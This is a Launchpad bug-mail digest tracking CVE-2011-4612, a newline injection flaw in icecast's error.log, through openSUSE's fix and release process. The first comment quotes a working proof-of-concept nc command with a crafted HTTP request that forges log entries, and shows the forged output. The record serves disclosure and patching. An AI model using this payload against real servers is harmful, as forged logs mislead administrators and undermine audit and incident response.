Launchpad has imported 7 comments from the remote bug at https://bugzilla.novell.com/show_bug.cgi?id=737255.
If you reply to an imported comment from within Launchpad, your comment will be sent to the remote bug automatically. Read more about Launchpad's inter-bugtracker facilities at https://help.launchpad.net/InterBugTracking. ------------------------------------------------------------------------ On 2011-12-16T08:19:09+00:00 Lnussel-k wrote: Your friendly security team received the following report via oss-security. Please respond ASAP. The issue is public. CVE-2011-4612 It was found that remote users could inject newlines in the error.log of icecast, therefore forging log entries Citing https://launchpad.net/bugs/894782: Running this command against an icecast2 running on 127.0.0.1... echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d% 0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d% 0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN% 20fserve/fserve_client_create%20req%20for%20file% 20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null ...causes the following to be written to /var/log/icecast2/error.log: [2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory [1970-01-01 00:00:00] PHUN I'm feeling phunny ..." Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/4 ------------------------------------------------------------------------ On 2011-12-16T23:00:12+00:00 Swamp-a wrote: bugbot adjusting priority Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/5 ------------------------------------------------------------------------ On 2012-03-06T11:46:19+00:00 Tiwai-r wrote: The fixed packages for 11.4, 12.1 and FACTORY are submitted via SRID 108146, 108145 and 108151, respectively. Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/14 ------------------------------------------------------------------------ On 2012-03-06T12:00:15+00:00 Bwiedemann wrote: This is an autogenerated message for OBS integration: This bug (737255) was mentioned in https://build.opensuse.org/request/show/108145 12.1 / icecast https://build.opensuse.org/request/show/108146 11.4 / icecast https://build.opensuse.org/request/show/108151 Factory / icecast Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/15 ------------------------------------------------------------------------ On 2012-03-06T14:14:23+00:00 Swamp-a wrote: The SWAMPID for this issue is 45905. This issue was rated as low. Please submit fixed packages until 2012-04-03. When done, please reassign the bug to [email protected]. Patchinfo will be handled by security team. Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/16 ------------------------------------------------------------------------ On 2012-03-08T11:08:19+00:00 Swamp-a wrote: Update released for: icecast, icecast-debuginfo, icecast-debugsource Products: openSUSE 11.4 (debug, i586, x86_64) Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/17 ------------------------------------------------------------------------ On 2012-03-09T10:49:47+00:00 Lnussel-k wrote: all released Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/18 ** Changed in: opensuse Status: Unknown => Fix Released ** Changed in: opensuse Importance: Unknown => Low -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/894782 Title: Newline injection in error.log To manage notifications about this bug go to: https://bugs.launchpad.net/icecast/+bug/894782/+subscriptions -- ubuntu-bugs mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
